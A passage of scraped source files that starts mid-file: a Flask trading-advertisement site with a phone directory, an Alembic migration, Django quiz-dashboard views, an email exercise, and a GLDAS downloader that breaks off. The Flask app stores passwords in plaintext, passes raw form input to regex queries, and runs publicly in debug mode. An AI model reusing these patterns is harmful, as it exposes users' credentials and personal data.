'+piaofenxi0['机构']\n piaofenxi0=piaofenxi0[['时间加','收票','出票','收代持','出代持','时间']] \n # h4 = piaofenxi.to_html(index=False)\n print(piaofenxi0)\n else:\n \n for i in range(0,len(value2)):\n cursor = collection6.find({\"$and\":[{'统计日期':{'$gte':str(shijian5)}},{'机构':value2[i]}]})\n piaofenxi1=pd.DataFrame(list(cursor))\n piaofenxi0=pd.concat([piaofenxi1,piaofenxi0])\n piaofenxi0=piaofenxi0[['机构','收票','出票','收代持','出代持','统计日期','时间']]\n piaofenxi0['收票']=piaofenxi0['收票'].astype('int')\n piaofenxi0['出票']=piaofenxi0['出票'].astype('int')\n piaofenxi0['收代持']=piaofenxi0['收代持'].astype('int')\n piaofenxi0['出代持']=piaofenxi0['出代持'].astype('int')\n piaofenxi0['时间加']=piaofenxi0['统计日期']+' '+piaofenxi0['机构']\n piaofenxi0=piaofenxi0[['时间加','收票','出票','收代持','出代持','时间']]\n\n # h4 = piaofenxi0.to_html(index=False)\n#\n image_shun=piaofenxi0['时间加'].tolist()\n \n h4=piaofenxi0.set_index('时间加').T.to_dict('list')\n h3=huatudata5.set_index('时间加').T.to_dict('list')\n\n\n return render_template('image.html',entries=json.dumps(h3),entries2=json.dumps(h4),image_shun=json.dumps(image_shun),shou=shou,chu=chu,shouchubi=shouchubi)\n\n \n\n@app.route('/us',methods=['POST','GET'])\ndef us():\n\n return render_template('us.html')\n\n#\n\n@app.route('/', methods=['POST','GET'])\n@app.route('/home',methods=['POST','GET'])\n\ndef home():\n global collection13,collection5\n shengfen='不限'\n haoji='不限'\n jigou='不限'\n yewuu0='未选'\n yewuu=''\n yinlei='不限'\n name=''\n h2='会员广告展示区域。'\n zong=['']\n zong_shun=[]\n h3=['群友电话号码仅是了业务沟通而公开,随查随用,不提供下载。号码是从交易云账户或者公开广告中获取,如本人觉得不妥,请告知删除~']\n h1='即时广告:'\n h33=''\n 
shijian11=time.strftime('%y-%m-%d',time.localtime(time.time()))\n shijian11 = datetime.datetime.strptime(shijian11, \"%y-%m-%d\")\n shijian02=shijian11-datetime.timedelta(days=3)\n\n shijian11=shijian11.strftime(\"%Y-%m-%d\") #今天\n shijian02=shijian02.strftime(\"%Y-%m-%d\") #大前天\n\n cursor10 = collection10.find({\"$and\":[{'发送日期':str(shijian11)}]})\n number_df = pd.DataFrame(list(cursor10))\n if number_df.empty:\n sousuoci=0\n else:\n sousuoci=len(number_df)\n \n\n h=['广告展示区域。请点击按钮刷新广告!']\n if request.method == 'POST': #点击登录时\n if request.form['Submit']=='查询':\n jigou=request.form['good3']\n yewuu=request.form['good']\n yewuu0=yewuu.replace('chufu','出证').replace('shoufu','收证').replace('chuli','出理财').replace('shouli','收理财').replace('chucun','出存单').replace('shoucun','收存单').replace('shou','收票').replace('chu','出票')\n jigou=jigou.replace('0','中介').replace('1','国有行').replace('2','股份行1').replace('3','股份行2').replace('4','城商行').replace('5','农商行')\n \n\n\n \n if jigou=='不限':\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n data=pd.DataFrame({'登录日期':[shijian11], #\n '点击时间':[shijian_t], #\n '用户名':[tt],#\n '业务方向':[yewuu]\n }) #\n records = json.loads(data.T.to_json()).values() \n collection.insert(records) #\n cursor5 = collection5.find({\"$and\":[\n {'time':{'$gte':shijian02}},\n {yewuu:1},\n # {'hanglei2':1},\n ]})\n piaofen_df = pd.DataFrame(list(cursor5))\n\n h1='广告查询:'\n cursor2 = collection2.find({\"$and\":[{'业务':{yewuu:1}},{'发送日期':{'$gte':shijian02}}]})\n huiguang_df = pd.DataFrame(list(cursor2))\n#\n elif jigou=='所有银行':\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n data=pd.DataFrame({'登录日期':[shijian11], #\n '点击时间':[shijian_t], #\n '用户名':[tt],#\n '业务方向':[yewuu]#\n }) #\n records = json.loads(data.T.to_json()).values() #\n collection.insert(records) #\n cursor5 = collection5.find({\"$and\":[\n {'time':{'$gte':shijian02}},\n {yewuu:1},\n {'hanglei2':1},\n ]})\n piaofen_df = pd.DataFrame(list(cursor5))\n\n h1='广告查询:'\n cursor2 = collection2.find({\"$and\":[{'业务':{yewuu:1}},{'发送日期':{'$gte':shijian02}}]})\n huiguang_df = pd.DataFrame(list(cursor2))\n\n elif jigou=='非银行':\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n data=pd.DataFrame({'登录日期':[shijian11], #\n '点击时间':[shijian_t], #\n '用户名':[tt],#\n '业务方向':[yewuu]#\n }) #\n records = json.loads(data.T.to_json()).values() #\n collection.insert(records) #\n cursor5 = collection5.find({\"$and\":[\n {'time':{'$gte':shijian02}},\n {yewuu:1},\n {'hanglei2':jigou},\n ]})\n piaofen_df = pd.DataFrame(list(cursor5))\n\n h1='广告查询:'\n cursor2 = collection2.find({\"$and\":[{'业务':{yewuu:1}},{'发送日期':{'$gte':shijian02}}]})\n huiguang_df = pd.DataFrame(list(cursor2))\n\n else:\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n data=pd.DataFrame({'登录日期':[shijian11], #\n '点击时间':[shijian_t], #\n '用户名':[tt],#\n '业务方向':[yewuu]#\n }) #\n records = json.loads(data.T.to_json()).values() #\n collection.insert(records) #\n cursor5 = collection5.find({\"$and\":[\n {'time':{'$gte':shijian02}},\n {yewuu:1},\n {'hanglei3':0},\n ]})\n piaofen_df = pd.DataFrame(list(cursor5))\n\n h1='广告查询:'\n cursor2 = collection2.find({\"$and\":[{'业务':{yewuu:1}},{'发送日期':{'$gte':shijian02}}]})\n huiguang_df = pd.DataFrame(list(cursor2))\n#搜索通讯录\n\n if piaofen_df.empty:\n\n if huiguang_df.empty:\n zong=['暂无当日广告。']\n\n else:\n huiguang_df=huiguang_df[['发送日期','发送时间','机构','用户','业务','备注','用户名']]\n huiguang_df=huiguang_df.drop_duplicates('用户名',keep='last') #删除重复广告\n\n 
huiguang_df['昵称']=huiguang_df['机构']+huiguang_df['用户']+huiguang_df['用户名']\n huiguang_df['内容']=huiguang_df['业务'].astype('str')+' 。'+huiguang_df['备注']\n huiguang_df['行类']='会员机构'\n huiguang_df['内容'] = huiguang_df['内容'].astype('str')\n\n huiguang_df=huiguang_df[['发送日期','发送时间','昵称','行类','内容']]\n zong_df= huiguang_df.sort_values(by=['发送日期','发送时间'], ascending=False)\n \n\n zong_df['时间']=zong_df['发送日期']+' '+zong_df['发送时间']\n for i in range(0,len(zong_df)):\n zong_df.loc[i,'顺序']=i+1\n zong_df['顺序'] = zong_df['顺序'].astype('str')\n\n\n\n\n \n zong_shun=zong_df['顺序'].tolist()\n zong_df=zong_df[['顺序','时间','昵称','行类','内容']]\n zong=zong_df.set_index('顺序').T.to_dict('list')\n\n\n\n \n else:\n piaofen_df=piaofen_df[['time','time2','nickname','hanglei1','content']]\n piaofen_df.drop_duplicates('content', keep='last') #删除重复广告\n piaofen_df= piaofen_df.sort_values(by=['time','time2'], ascending=False)\n piaofen_df = piaofen_df.reset_index(drop=True) \n a=len(piaofen_df)\n len0=min(a,100)\n piaofen_df.drop(0)\n result=piaofen_df[0:len0]\n pd.set_option('max_colwidth', 500) #让dataframe全部显示全\n result.rename(columns={'time':'发送日期','time2':'发送时间','nickname':'昵称','hanglei1':'行类','content':'内容'}, inplace=True)\n result= result.sort_values(by=['发送日期','发送时间'], ascending=False)\n print(result.head())\n if huiguang_df.empty:\n zong_df=result\n\n else:\n huiguang_df=huiguang_df[['发送日期','发送时间','机构','用户','业务','备注','用户名']]\n huiguang_df=huiguang_df.drop_duplicates('用户名',keep='last') #删除重复广告\n\n huiguang_df['昵称']=huiguang_df['机构']+huiguang_df['用户']+huiguang_df['用户名']\n huiguang_df['内容']=huiguang_df['业务'].astype('str')+' 。'+huiguang_df['备注']\n huiguang_df['行类']='会员机构'\n huiguang_df['内容'] = huiguang_df['内容'].astype('str')\n\n huiguang_df=huiguang_df[['发送日期','发送时间','昵称','行类','内容']]\n huiguang_df= huiguang_df.sort_values(by=['发送日期','发送时间'], ascending=False)\n zong_df=pd.concat([huiguang_df,result])\n print(zong_df)\n\n zong_df=zong_df.reset_index(drop = True)\n\n zong_df['时间']=zong_df['发送日期']+' '+zong_df['发送时间']\n for i in range(0,len(zong_df)):\n zong_df.loc[i,'顺序']=i+1\n zong_df['顺序'] = zong_df['顺序'].astype('str')\n zong_shun=zong_df['顺序'].tolist()\n\n zong_df=zong_df[['顺序','时间','昵称','行类','内容']]\n zong=zong_df.set_index('顺序').T.to_dict('list')\n\n\n\n\n\n else:\n\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n shengfen=request.form['good3']\n yinlei=request.form['good']\n if shengfen=='不限' and yinlei=='不限' and request.form['姓名']=='':\n\n h3=['请在省份、银行分类、昵称中至少填入一项已知信息。']\n else:\n\n\n if shengfen=='不限' and yinlei!='不限' and request.form['姓名']!='':\n \n cursor13 = collection13.find({ \"$and\":[{'银行分类':yinlei},{'姓名':{'$regex':request.form['姓名']}}]}) \n\n\n\n if shengfen!='不限' and yinlei=='不限' and request.form['姓名']!='':\n\n cursor13 = collection13.find({ \"$and\":[{'省份':shengfen},{'姓名':{'$regex':request.form['姓名']}}]}) \n\n if shengfen!='不限' and yinlei!='不限' and request.form['姓名']=='': ######\n \n cursor13 = collection13.find({ \"$and\":[{'省份':shengfen},{'银行分类':yinlei}]}) \n\n if shengfen=='不限' and yinlei=='不限' and request.form['姓名']!='':\n \n cursor13 = collection13.find({'姓名':{'$regex':request.form['姓名']}}) \n\n if shengfen=='不限' and yinlei!='不限' and request.form['姓名']=='':\n \n cursor13 = collection13.find({'银行分类':yinlei}) \n\n if shengfen!='不限' and yinlei=='不限' and request.form['姓名']=='':\n \n cursor13= collection13.find({'省份':shengfen})\n\n\n \n number_df = pd.DataFrame(list(cursor13))\n \n if number_df.empty:\n h3=['未找到联系方式。']\n\n else:\n number_df=number_df[:min(len(number_df),2)]\n 
number_df=number_df[['省份','银行分类','姓名','电话','票据业务','福费廷业务','存单业务','理财业务']]\n h3=number_df.set_index('电话').T.to_dict('list')\n data=pd.DataFrame({'发送日期':[shijian11], #\n '发送时间':[shijian_t], #\n '用户名':[tt],#\n '省份':[shengfen],#\n '银行分类':[yinlei],\n '昵称':[request.form['姓名']]\n }) #\n records = json.loads(data.T.to_json()).values() #\n collection4.insert(records) #\n\n\n \n\n \n\n\n\n\n\n\n \n\n cursor = collection.find({'登录日期':shijian11})\n jishi_df = pd.DataFrame(list(cursor))\n if jishi_df.empty :\n chu=0\n shou=0\n \n else:\n jishiz=jishi_df.groupby(['业务方向']).size()\n jishiz=jishiz.reset_index(drop = False)\n\n jishiz=jishiz[(jishiz['业务方向']=='chu') |(jishiz['业务方向']=='shou')]\n\n jishiz=jishiz.reset_index(drop = False)\n\n if len(jishiz)<2:\n chu=0\n shou=0\n else:\n chu=jishiz.loc[0,0]\n shou=jishiz.loc[1,0]\n return render_template('home.html',jigou=jigou,yewu0=yewuu0,haosheng=shengfen,haoji=yinlei,zong_json =json.dumps(zong),h1=h1,chu=chu,shou=shou,sousuoci=sousuoci,result_json =json.dumps(h3),zong_shun=json.dumps(zong_shun))\n\n\n\n\n\n@app.route('/regist1', methods=['POST','GET'])\ndef regist1():\n return render_template('regist1.html', username=request.args.get('username'))\n\n\n\n\n@app.route('/regist', methods=['POST','GET'])\ndef regist():\n shijian11=time.strftime('%y-%m-%d',time.localtime(time.time()))\n shijian11 = datetime.datetime.strptime(shijian11, \"%y-%m-%d\")\n shijian11=shijian11.strftime(\"%Y-%m-%d\") #今天\n\n \n if request.method == 'POST': #点击注册时\n if (request.form['username']!='') and request.form['jigou']!='' and request.form['password']!='' :\n\n data=pd.DataFrame({'用户名':[request.form['username']], \n '发送时间':[shijian11], #\n '机构':[request.form['jigou']],#\n '密码':[request.form['password']]\n }) \n records = json.loads(data.T.to_json()).values() \n collection3.insert(records) \n return redirect(url_for('regist1')) \n return render_template('regist.html')\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'),404\n\n@app.errorhandler(500)\ndef page_not_found(e):\n return render_template('500.html'),500\n\n\n#\n\n\n\n\nif __name__==\"__main__\":\n #app.run(host='0.0.0.0',port=443, ssl_context=('1531224955617.pem', '1531224955617.key'),debug=True,threaded=True)\n app.run(host='0.0.0.0',port=80,debug=True,threaded=True)\n","sub_path":"jinwang23.py","file_name":"jinwang23.py","file_ext":"py","file_size_in_byte":40434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"101800593","text":"\"\"\"Label new update\n\nRevision ID: ed117c4918a6\nRevises: \nCreate Date: 2017-11-04 03:35:54.647403\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ed117c4918a6'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('labels',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('classifications',\n sa.Column('blog_id', sa.Integer(), nullable=True),\n sa.Column('label_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['blog_id'], ['blogs.id'], ),\n sa.ForeignKeyConstraint(['label_id'], ['labels.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('classifications')\n op.drop_table('labels')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ed117c4918a6_label_new_update.py","file_name":"ed117c4918a6_label_new_update.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"386938822","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.contrib.auth.models import User\nfrom testApp import models\n\n\nclass HomePageView(View):\n template_name = 'dashboard/HomePage.html'\n\n def get(self, request):\n user_object = User.objects.get(username=request.user)\n test_status_string = None\n testbatch = None\n if user_object.is_staff:\n all_tests = models.TestTable.objects.all()\n test_status_string = self.check_status(all_tests)\n is_admin = True\n else:\n batch_object = models.UserExtensionTable.objects.filter(Student=user_object)\n testbatch = []\n for batch in batch_object:\n testbatch_1 = models.TestBatchJunction.objects.filter(Batch=batch.Batch, Test__Test_Ready=True)\n for tb in testbatch_1:\n if not models.UserTestJunction.objects.filter(Test=tb.Test, Student=user_object):\n testbatch.append(tb)\n is_admin = False\n return render(request, self.template_name, {\n 'testbatch': testbatch,\n 'is_admin': is_admin,\n 'test_status_string': test_status_string\n })\n\n def post(self, request):\n return HomePageView.get(self, request)\n\n def check_status(self, all_tests):\n test_status_string = [] # (Test name , Status Description, Status )\n for test in all_tests:\n test_mini_string = []\n all_test_subjects = models.TestSubjectTable.objects.filter(Test=test)\n test_mini_string.append(test.Test_Name)\n status_fail = False\n status_string = ''\n has_data = False\n for ts in all_test_subjects:\n has_data =True\n required_count = ts.sub_wise_number_of_questions\n available_count = models.QuestionsTable.objects.filter(Subject=ts.Subject).count()\n status_string = status_string + ts.Subject.Subject_name + ' : ' + str(available_count) \\\n + '/' + str(required_count) + ' '\n if not required_count <= available_count:\n status_fail = True\n if not has_data:\n status_string = 'You havent added Subject wise Split Up'\n status_fail = True\n test_mini_string.append(status_string)\n if status_fail:\n test_mini_string.append('Test Not Ready')\n else:\n test_mini_string.append('Test Ready')\n test_status_string.append(test_mini_string)\n return test_status_string\n\n\nclass MyTestView(View):\n\n def get(self, request):\n user = User.objects.get(username=request.user)\n all_taken_tests = models.UserTestJunction.objects.filter(Student=user)\n print(all_taken_tests)\n return render(request, 'dashboard/mytests.html', {\n 'all_tests': all_taken_tests\n })\n\n\nclass TestQuestionsView(View):\n\n def get(self, request, test_id):\n test = models.TestTable.objects.get(id=test_id)\n user = User.objects.get(username=request.user)\n utj = models.UserTestJunction.objects.get(Student=user, Test=test)\n utqj = models.UserTestQuestionJunction.objects.filter(UserTest=utj)\n bookmarks = models.BookmarksTable.objects.filter(Student=user)\n bookmark_list = []\n for bookmark in bookmarks:\n bookmark_list.append(bookmark.bookmarked_question.id)\n total_time_spent = 0\n subject_wise_array = []\n for question in utqj:\n total_time_spent = total_time_spent + question.timetaken\n subject_list = set(utqj.values_list('question__Subject', flat=True))\n for sub_id in 
subject_list:\n subject = models.SubjectsTable.objects.get(id=sub_id)\n query = models.UserTestQuestionJunction.objects.filter(question__Subject=subject)\n total_number_of_subject_questions = query.count()\n correct_number_of_subject_questions = query.filter(result=1).count()\n incorrect_number_of_subject_questions = query.filter(result=3).count()\n positive_marks = correct_number_of_subject_questions*test.Positive_mark\n negative_marks = incorrect_number_of_subject_questions*test.Negative_mark\n subject_wise_array.append([subject.Subject_name,\n total_number_of_subject_questions,\n correct_number_of_subject_questions,\n incorrect_number_of_subject_questions,\n positive_marks,\n negative_marks,\n positive_marks-negative_marks\n ])\n # subject_wise_array.append([subject.Subject_name, subject])\n Total_marks = test.Number_of_Questions*test.Positive_mark\n no_of_correct_answer = utqj.filter(result=1).count()\n no_of_unanswered_answer = utqj.filter(result=2).count()\n no_of_wrong_answer = utqj.filter(result=3).count()\n obtained_marks = (no_of_correct_answer * test.Positive_mark) - (no_of_wrong_answer * test.Negative_mark)\n return render(request, 'dashboard/testquestions.html', {\n 'all_questions_utqj': utqj,\n 'test_id': test_id,\n 'bookmark_list': bookmark_list,\n 'Total_marks': Total_marks,\n 'Total_time': test.Time_allotted/60,\n 'Total_questions': test.Number_of_Questions,\n 'user_marks': obtained_marks,\n 'total_time_spent_min': int(total_time_spent/60),\n 'total_time_spent_sec': int(total_time_spent % 60),\n 'Total_correct': no_of_correct_answer,\n 'Total_incorrect': no_of_wrong_answer,\n 'Total_unanswered': no_of_unanswered_answer,\n 'percentage_scored': obtained_marks/Total_marks*100,\n 'subject_wise_array': subject_wise_array\n })\n\n\nclass AddBookmarkView(View):\n\n def get(self, request, test_id):\n user = User.objects.get(username=request.user)\n bookmark = models.BookmarksTable()\n bookmark.Student = user\n question = models.QuestionsTable.objects.get(id=int(request.GET['question_id']))\n bookmark.bookmarked_question = question\n try:\n bookmark.doubt_description = self.request.GET['doubt_description']\n except Exception as e:\n bookmark.doubt_description = ''\n bookmark.save()\n return redirect('dashboard:testquestions', test_id)\n\n\nclass RemoveBookmarkView(View):\n\n def get(self, request, question_id):\n models.BookmarksTable.objects.get(id=question_id).delete()\n return redirect('dashboard:bookmarklist')\n\n\nclass BookMarkListView(View):\n\n def get(self, request):\n user = User.objects.get(username=request.user)\n Data_array = []\n bookmarks = models.BookmarksTable.objects.filter(Student=user)\n Data_array.append(['All Questions', bookmarks])\n subject_id_list = set(bookmarks.values_list('bookmarked_question__Subject__id', flat=True))\n for ids in subject_id_list:\n print('here')\n bookmarks_array = bookmarks.filter(bookmarked_question__Subject__id=ids)\n subject_name = bookmarks_array[0].bookmarked_question.Subject.Subject_name\n Data_array.append([subject_name, bookmarks_array])\n return render(request, 'dashboard/bookmarkslist.html', {\n 'Data_array': Data_array\n })\n\n\nclass ProfileView(View):\n\n def get(self, request):\n user = models.User.objects.get(username=request.user)\n batch_list = models.UserExtensionTable.objects.filter(Student=user)\n return render(request, 'dashboard/profile.html', {\n 'user': user,\n 'batch_list': batch_list\n })\n\n\nclass AboutUs(View):\n\n def get(self, request):\n return render(request, 'dashboard/aboutus.html')\n\n\nclass 
CustomAdmin(View):\n\n    def get(self, request):\n        student_list = models.User.objects.filter()\n        batch_list = models.BatchTable.objects.filter()\n        return render(request, 'dashboard/custom_admin.html', {\n            'student_list': student_list,\n            'batch_list': batch_list,\n            'msg': ''\n        })\n\n    def post(self, request):\n        batch = models.BatchTable.objects.get(id=int(request.POST['batch']))\n        for student_id in request.POST.getlist('student_list'):\n            user = models.User.objects.get(id=int(student_id))\n            models.UserExtensionTable(Student=user, Batch=batch).save()\n        student_list = models.User.objects.filter()\n        batch_list = models.BatchTable.objects.filter()\n        return render(request, 'dashboard/custom_admin.html', {\n            'student_list': student_list,\n            'batch_list': batch_list,\n            'msg': 'successfully added!!'\n        })\n","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"488998889","text":"#coding:utf-8\n\"\"\"\nRead an email address from the console; the program extracts the username and the company name and prints both to the console.\nRequirements:\n1. Validate that the input matches the expected format (xx@yy.com); if it does, go to the next step,\notherwise print the message \"incorrect email format\". The address must end with .com.\n2. The whole \"input -> output result\" cycle can repeat in a loop.\n3. Typing the letter Q (case-insensitive) exits the loop and ends the program.\n\"\"\"\ndef main():\n    while True:\n        email = input(\"Please enter your email address (enter Q or q to quit): \")\n        if email == \"Q\" or email == \"q\":\n            break\n        if \"@\" in email and email.endswith(\".com\"):\n            print(\"Your username is:\", email.split(\"@\")[0])\n            print(\"Your company name is:\", (email.split(\"@\")[1]).replace(\".com\",\"\"))\n        else:\n            print(\"incorrect email format\")\n\nif __name__ == \"__main__\":\n    main()","sub_path":"demo05/day02_exc13.py","file_name":"day02_exc13.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"242480186","text":"\"\"\"\nModule managing download of NOAH GLDAS data.\n\"\"\"\n\nimport os\nimport sys\nimport glob\nimport argparse\nfrom functools import partial\n\nfrom trollsift.parser import validate, parse, globify\nfrom datetime import datetime\nfrom datedown.interface import mkdate\nfrom datedown.dates import daily\nfrom datedown.urlcreator import create_dt_url\nfrom datedown.fname_creator import create_dt_fpath\nfrom datedown.interface import download_by_dt\nfrom datedown.down import download\n\n\ndef gldas_folder_get_version_first_last(\n    root, fmt=None, subpaths=[\"{time:%Y}\", \"{time:%j}\"]\n):\n    \"\"\"\n    Get product version and first and last product which exists under the root folder.\n\n    Parameters\n    ----------\n    root: string\n        Root folder on local filesystem\n    fmt: string, optional\n        Formatting string\n        (default: \"GLDAS_NOAH025_3H.A{time:%Y%m%d.%H%M}.0{version:2s}.nc4\")\n    subpaths: list, optional\n        Format of the subdirectories under root (default: ['{:%Y}', '{:%j}']).\n\n    Returns\n    -------\n    version: string\n        Found product version\n    start: datetime.datetime\n        First found product datetime\n    end: datetime.datetime\n        Last found product datetime\n    \"\"\"\n    if fmt is None:\n        fmt = \"GLDAS_NOAH025_3H{ep}.A{time:%Y%m%d.%H%M}.0{version:2s}.nc4\"\n\n    start = None\n    end = None\n    version = None\n    first_folder = get_first_gldas_folder(root, subpaths)\n    last_folder = get_last_gldas_folder(root, subpaths)\n\n    if first_folder is not None:\n        files = sorted(glob.glob(os.path.join(first_folder, globify(fmt))))\n        data = parse(fmt, os.path.split(files[0])[1])\n        start = data[\"time\"]\n        ep = data[\"ep\"]\n        version = f\"GLDAS_Noah_v{data['version']}_025{data['ep']}\"\n\n    if last_folder is not None:\n        files = 
sorted(glob.glob(os.path.join(last_folder, globify(fmt))))\n data = parse(fmt, os.path.split(files[-1])[1])\n end = data[\"time\"]\n\n return version, start, end\n\n\ndef get_last_gldas_folder(root, subpaths):\n \"\"\"\n Get last GLDAS folder name.\n\n Parameters\n ----------\n root : str\n Root path.\n subpaths : list of str\n Subpath information.\n\n Returns\n -------\n directory : str\n Last folder name.\n \"\"\"\n directory = root\n for level, subpath in enumerate(subpaths):\n last_dir = get_last_formatted_dir_in_dir(directory, subpath)\n if last_dir is None:\n directory = None\n break\n directory = os.path.join(directory, last_dir)\n\n return directory\n\n\ndef get_first_gldas_folder(root, subpaths):\n \"\"\"\n Get first GLDAS folder name.\n\n Parameters\n ----------\n root : str\n Root path.\n subpaths : list of str\n Subpath information.\n\n Returns\n -------\n directory : str\n First folder name.\n \"\"\"\n directory = root\n for level, subpath in enumerate(subpaths):\n last_dir = get_first_formatted_dir_in_dir(directory, subpath)\n if last_dir is None:\n directory = None\n break\n directory = os.path.join(directory, last_dir)\n\n return directory\n\n\ndef get_last_formatted_dir_in_dir(folder, fmt):\n \"\"\"\n Get the (alphabetically) last directory in a directory\n which can be formatted according to fmt.\n\n Parameters\n ----------\n folder : str\n Folder name.\n fmt : str\n Format string.\n\n Returns\n -------\n last_elem : str\n Last formatted directory.\n \"\"\"\n last_elem = None\n root_elements = sorted(os.listdir(folder))\n for root_element in root_elements[::-1]:\n if os.path.isdir(os.path.join(folder, root_element)):\n if validate(fmt, root_element):\n last_elem = root_element\n break\n\n return last_elem\n\n\ndef get_first_formatted_dir_in_dir(folder, fmt):\n \"\"\"\n Get the (alphabetically) first directory in a directory\n which can be formatted according to fmt.\n\n Parameters\n ----------\n folder : str\n Folder name.\n fmt : str\n Format string.\n\n Returns\n -------\n first_elem : str\n First formatted directory.\n \"\"\"\n first_elem = None\n root_elements = sorted(os.listdir(folder))\n for root_element in root_elements:\n if os.path.isdir(os.path.join(folder, root_element)):\n if validate(fmt, root_element):\n first_elem = root_element\n break\n\n return first_elem\n\n\ndef get_gldas_start_date(product):\n \"\"\"\n Get NOAH GLDAS start date.\n\n Parameters\n ----------\n product : str\n Product name.\n\n Returns\n -------\n start_date : datetime\n Start date of NOAH GLDAS product.\n \"\"\"\n dt_dict = {\n \"GLDAS_Noah_v20_025\": datetime(1948, 1, 1, 3),\n \"GLDAS_Noah_v21_025\": datetime(2000, 1, 1, 3),\n \"GLDAS_Noah_v21_025_EP\": datetime(2000, 1, 1, 3),\n }\n\n return dt_dict[product]\n\n\ndef parse_args(args):\n \"\"\"\n Parse command line parameters for recursive download.\n\n Parameters\n ----------\n args : list of str\n Command line parameters as list of strings.\n\n Returns\n -------\n args : argparse.Namespace\n Command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Download GLDAS data.\",\n formatter_class=argparse.RawTextHelpFormatter,\n )\n\n parser.add_argument(\n \"localroot\",\n help=\"Root of local filesystem where\" \"the data is stored.\",\n )\n\n parser.add_argument(\n \"-s\",\n \"--start\",\n type=mkdate,\n help=(\n \"Startdate as YYYY-MM-DD. \"\n \"If not given then the target\"\n \"folder is scanned for a start date. 
If no data\"\n \"is found there then the first available date \"\n \"of the product is used.\"\n ),\n )\n\n parser.add_argument(\n \"-e\",\n \"--end\",\n type=mkdate,\n help=(\n \"Enddate. In format YYYY-MM-DD.If not given then the \"\n \"current date is used.\"\n ),\n )\n\n help_string = \"\\n\".join(\n [\n \"GLDAS product to download.\",\n \"GLDAS_Noah_v20_025 available from {} to 2014-12-31\",\n \"GLDAS_Noah_v21_025 available from {}\",\n \"GLDAS_Noah_v21_025_EP available after GLDAS_Noah_v21_025\",\n ]\n )\n\n help_string = help_string.format(\n get_gldas_start_date(\"GLDAS_Noah_v20_025\"),\n get_gldas_start_date(\"GLDAS_Noah_v21_025\"),\n )\n\n parser.add_argument(\n \"--product\",\n choices=[\n \"GLDAS_Noah_v20_025\",\n \"GLDAS_Noah_v21_025\",\n \"GLDAS_Noah_v21_025_EP\",\n ],\n default=\"GLDAS_Noah_v21_025\",\n help=help_string,\n )\n\n parser.add_argument(\"--username\", help=\"Username to use for download.\")\n\n parser.add_argument(\"--password\", help=\"password to use for download.\")\n\n parser.add_argument(\n \"--n_proc\",\n default=1,\n type=int,\n help=\"Number of parallel processes to use for\" \"downloading.\",\n )\n\n args = parser.parse_args(args)\n # set defaults that can not be handled by argparse\n\n # Compare versions to prevent mixing data sets\n version, first, last = gldas_folder_get_version_first_last(args.localroot)\n if args.product and version and (args.product != version):\n raise Exception(\n \"Error: Found products of different version ({}) \"\n \"in {}. Abort download!\".format(version, args.localroot)\n )\n\n if args.start is None or args.end is None:\n if not args.product:\n args.product = version\n if args.start is None:\n if last is None:\n if args.product:\n args.start = get_gldas_start_date(args.product)\n else:\n # In case of no indication if version, use GLDAS Noah 2.0\n # start time, because it has the longest time span\n args.start = get_gldas_start_date(\"GLDAS_Noah_v20_025\")\n else:\n args.start = last\n if args.end is None:\n args.end = datetime.now()\n\n prod_urls = {\n \"GLDAS_Noah_v20_025\": {\n \"root\": \"hydro1.gesdisc.eosdis.nasa.gov\",\n \"dirs\": [\"data\", \"GLDAS\", \"GLDAS_NOAH025_3H.2.0\", \"%Y\", \"%j\"],\n },\n \"GLDAS_Noah_v21_025\": {\n \"root\": \"hydro1.gesdisc.eosdis.nasa.gov\",\n \"dirs\": [\"data\", \"GLDAS\", \"GLDAS_NOAH025_3H.2.1\", \"%Y\", \"%j\"],\n },\n \"GLDAS_Noah_v21_025_EP\": {\n \"root\": \"hydro1.gesdisc.eosdis.nasa.gov\",\n \"dirs\": [\"data\", \"GLDAS\", \"GLDAS_NOAH025_3H_EP.2.1\", \"%Y\", \"%j\"],\n },\n }\n\n args.urlroot = prod_urls[args.product][\"root\"]\n args.urlsubdirs = prod_urls[args.product][\"dirs\"]\n args.localsubdirs = [\"%Y\", \"%j\"]\n\n print(\n \"Downloading data from {} to {} \"\n \"into folder {}.\".format(\n args.start.isoformat(), args.end.isoformat(), args.localroot\n )\n )\n return args\n\n\ndef main(args):\n \"\"\"\n Main routine used for command line interface.\n\n Parameters\n ----------\n args : list of str\n Command line arguments.\n \"\"\"\n args = parse_args(args)\n\n dts = list(daily(args.start, args.end))\n url_create_fn = partial(\n create_dt_url, root=args.urlroot, fname=\"\", subdirs=args.urlsubdirs\n )\n fname_create_fn = partial(\n create_dt_fpath,\n root=args.localroot,\n fname=\"\",\n subdirs=args.localsubdirs,\n )\n\n down_func = partial(\n download,\n num_proc=args.n_proc,\n username=args.username,\n password=\"'\" + args.password + \"'\",\n recursive=True,\n filetypes=[\"nc4\", \"nc4.xml\"],\n )\n download_by_dt(\n 